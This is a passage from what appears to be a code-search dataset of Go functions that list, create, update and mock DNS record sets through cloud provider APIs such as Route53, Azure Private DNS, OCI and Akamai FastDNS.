resp.ResourceRecordSets...)\n\t\tif *resp.IsTruncated {\n\t\t\treq.StartRecordName = resp.NextRecordName\n\t\t\treq.StartRecordType = resp.NextRecordType\n\t\t\treq.StartRecordIdentifier = resp.NextRecordIdentifier\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// unescape wildcards\n\t//for _, rrset := range rrsets {\n\t//\trrset.Name = aws.String(unescaper.Replace(*rrset.Name))\n\t//}\n\n\treturn\n}", "func (client DnsClient) patchRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPatch, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response PatchRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (d *DNS) GetResourceRecordSets(projectID string, managedZone string) ([]*v1.ResourceRecordSet, error) {\n\tctx := context.Background()\n\trrsService := v1.NewResourceRecordSetsService(d.V1)\n\trrsListCall := rrsService.List(projectID, managedZone).Context(ctx)\n\trrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn rrsList.Rrsets, nil\n}", "func (_Contract *ContractSession) SetDNSRecords(node [32]byte, data []byte) (*types.Transaction, error) {\n\treturn _Contract.Contract.SetDNSRecords(&_Contract.TransactOpts, node, data)\n}", "func (client *RecordSetsClient) createOrUpdateCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, recordType RecordType, relativeRecordSetName string, parameters RecordSet, options *RecordSetsCreateOrUpdateOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/{recordType}/{relativeRecordSetName}\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif recordType == \"\" {\n\t\treturn nil, errors.New(\"parameter recordType cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{recordType}\", url.PathEscape(string(recordType)))\n\tif relativeRecordSetName == \"\" {\n\t\treturn nil, errors.New(\"parameter relativeRecordSetName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{relativeRecordSetName}\", relativeRecordSetName)\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodPut, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\tif options != nil && options.IfMatch != nil {\n\t\treq.Header.Set(\"If-Match\", *options.IfMatch)\n\t}\n\tif options != nil && options.IfNoneMatch != nil {\n\t\treq.Header.Set(\"If-None-Match\", *options.IfNoneMatch)\n\t}\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, req.MarshalAsJSON(parameters)\n}", "func (m *MockClient) ListResourceRecordSets(arg0 *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (m *MockClient) ListResourceRecordSets(input *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", input)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func updateRecord(client *route53.Route53, zoneID string, targetRecord string, ip net.IP) (err error) {\n\tname := recordName(targetRecord)\n\t// retrieve current record sets starting with our target name\n\trrsets, err := client.ListResourceRecordSets(&route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(zoneID),\n\t\tStartRecordName: aws.String(name),\n\t})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not retrieve records for zoneID %q: %s\", zoneID, err)\n\t}\n\n\t// check the IP address that there if it is.\n\tfor _, rr := range rrsets.ResourceRecordSets {\n\t\tif *rr.Name == name && *rr.Type == route53.RRTypeA {\n\t\t\tif len((*rr).ResourceRecords) != 1 {\n\t\t\t\treturn fmt.Errorf(\"cowardly refusing to modify a complicated ResourceRecord: multiple RR\")\n\t\t\t}\n\t\t\tcurr := *(*rr).ResourceRecords[0].Value\n\t\t\tif curr == ip.String() {\n\t\t\t\tlog.Printf(\"no need to update record %q, already pointing to %q\", name, ip)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}\n\n\t// UPSERT to create or update the record!\n\t_, err = client.ChangeResourceRecordSets(&route53.ChangeResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(zoneID),\n\t\tChangeBatch: &route53.ChangeBatch{\n\t\t\tChanges: []*route53.Change{\n\t\t\t\t{\n\t\t\t\t\tAction: aws.String(route53.ChangeActionUpsert),\n\t\t\t\t\tResourceRecordSet: &route53.ResourceRecordSet{\n\t\t\t\t\t\tName: aws.String(name),\n\t\t\t\t\t\tType: aws.String(route53.RRTypeA),\n\t\t\t\t\t\tTTL: aws.Int64(60),\n\t\t\t\t\t\tResourceRecords: []*route53.ResourceRecord{\n\t\t\t\t\t\t\t{Value: aws.String(ip.String())},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t})\n\n\treturn err\n}", "func (m *MockClient) ChangeResourceRecordSets(arg0 *route53.ChangeResourceRecordSetsInput) (*route53.ChangeResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ChangeResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ChangeResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (m *MockClient) ChangeResourceRecordSets(arg0 *route53.ChangeResourceRecordSetsInput) (*route53.ChangeResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ChangeResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ChangeResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_Contract *ContractTransactorSession) SetDNSRecords(node [32]byte, data []byte) (*types.Transaction, error) {\n\treturn _Contract.Contract.SetDNSRecords(&_Contract.TransactOpts, node, data)\n}", "func (d *DNSController) ensureDNSRecords(cluster, zone, region string, dnsObject *feddnsv1a1.MultiClusterServiceDNSRecord) error {\n\t// Quinton: Pseudocode....\n\t// See https://github.com/kubernetes/kubernetes/pull/25107#issuecomment-218026648\n\t// For each dnsObject we need the following DNS names:\n\t// mysvc.myns.myfed.svc.z1.r1.mydomain.com (for zone z1 in region r1)\n\t// - an A record to IP address of specific shard in that zone (if that shard exists and has healthy endpoints)\n\t// - OR a CNAME record to the next level up, i.e. mysvc.myns.myfed.svc.r1.mydomain.com (if a healthy shard does not exist in zone z1)\n\t// mysvc.myns.myfed.svc.r1.mydomain.com\n\t// - a set of A records to IP addresses of all healthy shards in region r1, if one or more of these exist\n\t// - OR a CNAME record to the next level up, i.e. mysvc.myns.myfed.svc.mydomain.com (if no healthy shards exist in region r1)\n\t// mysvc.myns.myfed.svc.mydomain.com\n\t// - a set of A records to IP addresses of all healthy shards in all regions, if one or more of these exist.\n\t// - no record (NXRECORD response) if no healthy shards exist in any regions\n\t//\n\t// Each dnsObject has the current known state of loadbalancer ingress for the federated cluster stored in annotations.\n\t// So generate the DNS records based on the current state and ensure those desired DNS records match the\n\t// actual DNS records (add new records, remove deleted records, and update changed records).\n\t//\n\tdnsObjectName := dnsObject.Name\n\tnamespaceName := dnsObject.Namespace\n\tcommonPrefix := dnsObjectName + \".\" + namespaceName + \".\" + d.federationName + \".svc\"\n\n\tzoneDNSName := strings.Join([]string{commonPrefix, zone, region, d.dnsSuffix}, \".\") // zone level\n\tregionDNSName := strings.Join([]string{commonPrefix, region, d.dnsSuffix}, \".\") // region level, one up from zone level\n\tglobalDNSName := strings.Join([]string{commonPrefix, d.dnsSuffix}, \".\") // global level, one up from region level\n\n\tzoneEndpoints, regionEndpoints, globalEndpoints := d.getHealthyEndpoints(cluster, zone, region, dnsObject)\n\tif err := d.ensureDNSRrsets(d.dnsZone, zoneDNSName, zoneEndpoints, regionDNSName); err != nil {\n\t\treturn err\n\t}\n\tif err := d.ensureDNSRrsets(d.dnsZone, regionDNSName, regionEndpoints, globalDNSName); err != nil {\n\t\treturn err\n\t}\n\tif err := d.ensureDNSRrsets(d.dnsZone, globalDNSName, globalEndpoints, \"\"); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func findRecord(d *schema.ResourceData, meta interface{}) (*route53.ResourceRecordSet, error) {\n\tconn := meta.(*AWSClient).r53conn\n\t// Scan for a\n\tzone := cleanZoneID(d.Get(\"zone_id\").(string))\n\n\t// get expanded name\n\tzoneRecord, err := conn.GetHostedZone(&route53.GetHostedZoneInput{Id: aws.String(zone)})\n\tif err != nil {\n\t\tif r53err, ok := err.(awserr.Error); ok && r53err.Code() == \"NoSuchHostedZone\" {\n\t\t\treturn nil, r53NoHostedZoneFound\n\t\t}\n\t\treturn nil, err\n\t}\n\n\ten := expandRecordName(d.Get(\"name\").(string), *zoneRecord.HostedZone.Name)\n\tlog.Printf(\"[DEBUG] Expanded record name: %s\", en)\n\td.Set(\"fqdn\", en)\n\n\tlopts := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(cleanZoneID(zone)),\n\t\tStartRecordName: aws.String(en),\n\t\tStartRecordType: aws.String(d.Get(\"type\").(string)),\n\t}\n\n\tlog.Printf(\"[DEBUG] List resource records sets for zone: %s, opts: %s\",\n\t\tzone, lopts)\n\tresp, err := conn.ListResourceRecordSets(lopts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, record := range resp.ResourceRecordSets {\n\t\tname := cleanRecordName(*record.Name)\n\t\tif FQDN(strings.ToLower(name)) != FQDN(strings.ToLower(*lopts.StartRecordName)) {\n\t\t\tcontinue\n\t\t}\n\t\tif strings.ToUpper(*record.Type) != strings.ToUpper(*lopts.StartRecordType) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif record.SetIdentifier != nil && *record.SetIdentifier != d.Get(\"set_identifier\") {\n\t\t\tcontinue\n\t\t}\n\t\t// The only safe return where a record is found\n\t\treturn record, nil\n\t}\n\treturn nil, r53NoRecordsFound\n}", "func (i *InsertRecordsInput) SetRecords(records []*Record) {\n\ti.Data = make([]map[int]*InsertRecordsInputData, len(records))\n\tfor n, r := range records {\n\t\tdata := make(map[int]*InsertRecordsInputData)\n\t\tfor fid, val := range r.Fields {\n\t\t\tdata[fid] = &InsertRecordsInputData{Value: val}\n\t\t}\n\t\ti.Data[n] = data\n\t}\n}", "func (c DNSRecordSetClient) CreateOrUpdate(ctx context.Context, zoneID string, name string, recordType string, values []string, ttl int64) error {\n\tresourceGroupName, zoneName := resourceGroupAndZoneNames(zoneID)\n\trelativeRecordSetName, err := getRelativeRecordSetName(name, zoneName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tparams := dns.RecordSet{\n\t\tRecordSetProperties: newRecordSetProperties(dns.RecordType(recordType), values, ttl),\n\t}\n\t_, err = c.client.CreateOrUpdate(ctx, resourceGroupName, zoneName, relativeRecordSetName, dns.RecordType(recordType), params, \"\", \"\")\n\treturn err\n}", "func deltaBuilder(svc *route53.Route53, config *route53Zone) {\n\n\tvar changes []*route53.Change\n\n\tif config.ZoneID == \"\" {\n\t\tzoneID, err := getHostedZoneIDByNameLookup(svc, config.Name)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error obtaining hosted zoneid for zone %s with error %s\", config.Name, err)\n\t\t}\n\t\tconfig.ZoneID = zoneID\n\t}\n\n\t// Obtain the current records for the zone in the provided configuration\n\trecords, err := listAllRecordSets(svc, config.ZoneID)\n\tif err != nil {\n\t\tlog.Fatalf(\"Error obtaining records for zone %s with error %s\", config.Name, err)\n\t}\n\n\tfor _, crr := range config.ResourceRecordSets {\n\t\tfound := false\n\t\tfor _, rr := range records {\n\t\t\tif crr.Name == aws.StringValue(rr.Name) && crr.Type == aws.StringValue(rr.Type) {\n\t\t\t\tfound = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif found == true {\n\t\t\texists := false\n\t\t\tfor _, change := range changes {\n\t\t\t\tif aws.StringValue(change.ResourceRecordSet.Name) == crr.Name && aws.StringValue(change.ResourceRecordSet.Type) == crr.Type {\n\t\t\t\t\texists = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif exists == false {\n\t\t\t\tc, err := getChange(\"UPSERT\", &crr)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Error getting change to %s with error %s\", crr.Name, err)\n\t\t\t\t}\n\t\t\t\tchanges = append(changes, c)\n\t\t\t}\n\t\t}\n\t}\n\n\tdeletediff := findRecordsToDelete(config, records)\n\tchanges = append(changes, deletediff...)\n\n\tcreatediff := findRecordsToAdd(config, records)\n\tchanges = append(changes, creatediff...)\n\tprintReport(changes, config.Name)\n\n\terr = createResourceRecordSetChange(svc, config.ZoneID, changes)\n\tif err != nil {\n\t\tlog.Fatalf(\"Error create resource record change with error: %s\", err)\n\t}\n}", "func (s *ResourceRecordSetServer) ApplyDnsResourceRecordSet(ctx context.Context, request *dnspb.ApplyDnsResourceRecordSetRequest) (*dnspb.DnsResourceRecordSet, error) {\n\tcl, err := createConfigResourceRecordSet(ctx, request.ServiceAccountFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn s.applyResourceRecordSet(ctx, cl, request)\n}", "func (s *FastDNSv2Service) GetZoneRecordSets(ctx context.Context, zone string, opt *ListZoneRecordSetOptions) (*ListZoneRecordSets, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/recordsets\", zone)\n\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar z *ListZoneRecordSets\n\tresp, err := s.client.Do(ctx, req, &z)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn z, resp, nil\n}", "func (client *RecordSetsClient) updateCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, recordType RecordType, relativeRecordSetName string, parameters RecordSet, options *RecordSetsUpdateOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/{recordType}/{relativeRecordSetName}\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif recordType == \"\" {\n\t\treturn nil, errors.New(\"parameter recordType cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{recordType}\", url.PathEscape(string(recordType)))\n\tif relativeRecordSetName == \"\" {\n\t\treturn nil, errors.New(\"parameter relativeRecordSetName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{relativeRecordSetName}\", relativeRecordSetName)\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodPatch, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\tif options != nil && options.IfMatch != nil {\n\t\treq.Header.Set(\"If-Match\", *options.IfMatch)\n\t}\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, req.MarshalAsJSON(parameters)\n}", "func (client DnsClient) patchZoneRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPatch, \"/zones/{zoneNameOrId}/records\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response PatchZoneRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewRecordSetsClient(con *armcore.Connection, subscriptionID string) *RecordSetsClient {\n\treturn &RecordSetsClient{con: con, subscriptionID: subscriptionID}\n}", "func NewResourceSet(resources ...string) ResourceSet {\n\tresourceSet := make(ResourceSet)\n\tfor _, resource := range resources {\n\t\tresourceSet.Add(resource)\n\t}\n\n\treturn resourceSet\n}", "func (p *AWSProvider) UpdateRecords(zone string, endpoints, _ []*endpoint.Endpoint) error {\n\treturn p.submitChanges(zone, newChanges(route53.ChangeActionUpsert, endpoints))\n}", "func (client DnsClient) updateDomainRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPut, \"/zones/{zoneNameOrId}/records/{domain}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response UpdateDomainRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (client DnsClient) UpdateZoneRecords(ctx context.Context, request UpdateZoneRecordsRequest) (response UpdateZoneRecordsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.updateZoneRecords, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = UpdateZoneRecordsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = UpdateZoneRecordsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(UpdateZoneRecordsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into UpdateZoneRecordsResponse\")\n\t}\n\treturn\n}", "func (p *AWSProvider) CreateRecords(zone string, endpoints []*endpoint.Endpoint) error {\n\treturn p.submitChanges(zone, newChanges(route53.ChangeActionCreate, endpoints))\n}", "func (r Dns_Domain_ResourceRecord_SrvType) CreateObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord) (resp []datatypes.Dns_Domain_ResourceRecord, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord_SrvType\", \"createObjects\", params, &r.Options, &resp)\n\treturn\n}", "func ExampleAvailabilitySetsClient_CreateOrUpdate() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewAvailabilitySetsClient().CreateOrUpdate(ctx, \"myResourceGroup\", \"myAvailabilitySet\", armcompute.AvailabilitySet{\n\t\tLocation: to.Ptr(\"westus\"),\n\t\tProperties: &armcompute.AvailabilitySetProperties{\n\t\t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t\t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t\t},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.AvailabilitySet = armcompute.AvailabilitySet{\n\t// \tName: to.Ptr(\"myAvailabilitySet\"),\n\t// \tType: to.Ptr(\"Microsoft.Compute/availabilitySets\"),\n\t// \tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/availabilitySets/myAvailabilitySet\"),\n\t// \tLocation: to.Ptr(\"westus\"),\n\t// \tProperties: &armcompute.AvailabilitySetProperties{\n\t// \t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t// \t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t// \t},\n\t// \tSKU: &armcompute.SKU{\n\t// \t\tName: to.Ptr(\"Classic\"),\n\t// \t},\n\t// }\n}", "func (r Dns_Domain_ResourceRecord) CreateObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord) (resp []datatypes.Dns_Domain_ResourceRecord, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord\", \"createObjects\", params, &r.Options, &resp)\n\treturn\n}", "func (s *FastDNSv2Service) CreateRecordSet(ctx context.Context, rs *RecordSetCreateRequest) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", rs.Zone, rs.Name, rs.Type)\n\n\treq, err := s.client.NewRequest(\"POST\", u, rs)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar r *RecordSet\n\tresp, err := s.client.Do(ctx, req, &r)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn r, resp, nil\n}", "func (s *FastDNSv2Service) UpdateRecordSet(ctx context.Context, rs *RecordSetCreateRequest) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", rs.Zone, rs.Name, rs.Type)\n\n\treq, err := s.client.NewRequest(\"PUT\", u, rs)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar r *RecordSet\n\tresp, err := s.client.Do(ctx, req, &r)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn r, resp, nil\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(input interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), input)\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), arg0)\n}", "func ExampleAvailabilitySetsClient_CreateOrUpdate() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewAvailabilitySetsClient().CreateOrUpdate(ctx, \"myResourceGroup\", \"myAvailabilitySet\", armcompute.AvailabilitySet{\n\t\tLocation: to.Ptr(\"westus\"),\n\t\tAdditionalProperties: map[string]*string{\n\t\t\t\"anyProperty\": to.Ptr(\"fakeValue\"),\n\t\t},\n\t\tProperties: &armcompute.AvailabilitySetProperties{\n\t\t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t\t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t\t},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.AvailabilitySet = armcompute.AvailabilitySet{\n\t// \tName: to.Ptr(\"myAvailabilitySet\"),\n\t// \tType: to.Ptr(\"Microsoft.Compute/availabilitySets\"),\n\t// \tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/availabilitySets/myAvailabilitySet\"),\n\t// \tLocation: to.Ptr(\"westus\"),\n\t// \tProperties: &armcompute.AvailabilitySetProperties{\n\t// \t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t// \t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t// \t},\n\t// \tSKU: &armcompute.SKU{\n\t// \t\tName: to.Ptr(\"Classic\"),\n\t// \t},\n\t// }\n}", "func (resourceSet *ResourceSet) UnmarshalJSON(data []byte) error {\n\tvar sset set.StringSet\n\tif err := json.Unmarshal(data, &sset); err != nil {\n\t\treturn err\n\t}\n\n\t*resourceSet = make(ResourceSet)\n\tfor _, s := range sset.ToSlice() {\n\t\tresourceSet.Add(s)\n\t}\n\n\treturn nil\n}", "func newRecordSetsClient(subscriptionID string, baseURI string, authorizer autorest.Authorizer) privatedns.RecordSetsClient {\n\trecordsClient := privatedns.NewRecordSetsClientWithBaseURI(baseURI, subscriptionID)\n\tazure.SetAutoRestClientDefaults(&recordsClient.Client, authorizer)\n\treturn recordsClient\n}", "func (mr *MockClientMockRecorder) ChangeResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ChangeResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ChangeResourceRecordSets), arg0)\n}", "func (mr *MockClientMockRecorder) ChangeResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ChangeResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ChangeResourceRecordSets), arg0)\n}", "func getHostedZoneRecords(svc *route53.Route53, zone *string) (*route53.ListResourceRecordSetsOutput, error) {\n\n\trrInput := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: zone,\n\t}\n\thostedZoneRecordSets, err := svc.ListResourceRecordSets(rrInput)\n\n\tif err != nil {\n\t\tfmt.Printf(\"error obtaining hosted zone %s by id: %s\", aws.StringValue(zone), err)\n\t\treturn nil, err\n\t}\n\n\treturn hostedZoneRecordSets, nil\n}", "func (c *DeviceController) GetRecords(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tres := r53.GetRecordSets(vars[\"id\"])\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func testAccCheckDnsRecordSetDestroyProducerFramework(t *testing.T) func(s *terraform.State) error {\n\n\treturn func(s *terraform.State) error {\n\t\tfor name, rs := range s.RootModule().Resources {\n\t\t\tif rs.Type != \"google_dns_record_set\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif strings.HasPrefix(name, \"data.\") {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tp := acctest.GetFwTestProvider(t)\n\n\t\t\turl, err := acctest.ReplaceVarsForFrameworkTest(&p.FrameworkProvider.FrameworkProviderConfig, rs, \"{{DNSBasePath}}projects/{{project}}/managedZones/{{managed_zone}}/rrsets/{{name}}/{{type}}\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tbillingProject := \"\"\n\n\t\t\tif !p.BillingProject.IsNull() && p.BillingProject.String() != \"\" {\n\t\t\t\tbillingProject = p.BillingProject.String()\n\t\t\t}\n\n\t\t\t_, diags := 